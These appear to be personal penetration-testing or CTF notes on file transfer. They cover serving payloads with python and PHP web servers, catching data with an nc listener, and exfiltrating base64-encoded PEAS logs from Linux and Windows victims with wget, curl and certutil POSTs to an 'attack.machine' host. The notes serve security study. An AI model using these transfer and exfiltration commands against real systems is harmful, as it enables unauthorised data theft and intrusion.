Infil/Exfil notes

This is basically a cheatsheet for basic service setups for being able to get things onto and off of remote hosts.

Test servers

This is useful infra for getting payloads and tools onto remote hosts. Doubly so if you force a standard port like 80/443. Once these are up, you can usually curl/wget/iwr your payload right down.

  • Basic python server is like python3 -m http.server <port>
    • Defaults to port 8000
  • PHP's is like php -S localhost:8000
    • To serve to the rest of the network, bind to 0.0.0.0 instead of localhost. Obviously you can change the port too.

Passing PEAS logs and other files over HTTP

  • On attack machine:
    • nc -lvnp 80 > file.txt
    • This is basically a raw socket for catching HTTP traffic
  • On linux vic:
    • cat log.txt | base64 > log.b64
    • wget --post-file=log.b64 http://attack.machine
  • On Windows
    • certutil -encode log.txt log.b64
    • CMD
      • curl -X POST -d @log.b64 http://attack.machine
    • Powershell
      • cmd /c 'curl -X POST -d @log.b64 http://attack.machine'

After the curl/wget call, ctrl + c the nc process on the attack box. You should have the base64 encoded log back on the machine. To decode:

  • From Windows

    • Open in a text editor and remove the HTTP headers and certificate block notes
    • cat log.b64 | base64 --decode > winlog.txt
    • Windows terminals (both PS and CMD) use UTF-16LE formatting while all other text on a computer is usually UTF-8, so do this: iconv -f UTF-16LE -t UTF-8 <<< $(cat winlog.txt) > winlog_formatted.txt
    • Now you can cat winlog_formatted.txt | less -R to read the log.

  • From Linux

    • Again, open the log in a text editor to strip the HTTP headers
    • cat log.b4 | base64 --decode > linlog.txt
    • Linux logs are already in UTF8, so you should be able to read them right away.
      • cat linlog.txt | less -R

Misc

  • SCP
    • scp file user@host:filepath
  • N.b. evil-winrm has built-in upload/download features.